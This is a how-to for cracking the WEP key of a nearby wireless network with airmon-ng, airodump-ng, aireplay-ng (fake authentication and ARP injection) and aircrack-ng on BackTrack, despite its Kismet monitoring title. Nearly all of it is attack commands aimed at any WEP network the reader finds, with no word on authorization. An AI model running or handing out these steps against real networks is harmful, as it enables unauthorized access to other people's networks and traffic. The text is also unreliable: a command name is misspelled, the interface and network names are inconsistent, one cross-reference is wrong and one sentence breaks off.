Monitoring Wireless Traffic With Kismet
Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear.
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]
STEP 2:-
root@bt:~# airmon-ng start wlan0
STEP 3:-
Finding a suitable Target
After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command
root@bt:~# airdump-ng wlan0
STEP 4:-
Attacking The Target
Now to crack the WEP key you’ll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands
root@bt:~# airodump-ng --bssid 00:11:22:33:44:55 -c (channel no) -w (filename) mon0
- -w tells airodump to write the file
- -c is the channel of my target AP
STEP 5:-
using airplay speed up cracking:-
root@bt:~# aireplay-ng -1 3 -a 00:11:22:33:44:55 mon0
STEP 6:-
Associate your wireless card with the AP you are accessing.
root@bt:~#aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 mon0
- -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing
aireplay-ng -h
- 0 specifies the delay between attacks
- -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
- -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
- -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address.
macchanger -s mon0
STEP 7:-
Start packet injection with aireplay:-
root@bt:~#
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 mon0
- -b requires the MAC address of the AP we are accessing.
- -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address.
macchanger -s mon0
- if packets are being collected at a slow pace you can type
iwconfig ath0 rate auto
to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.
As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.
If you get a message like this:
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
STEP 8:-
Decrypting the WEP Key with Aircrack:-
root@bt:~# aircrack-ng filename.cap
Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.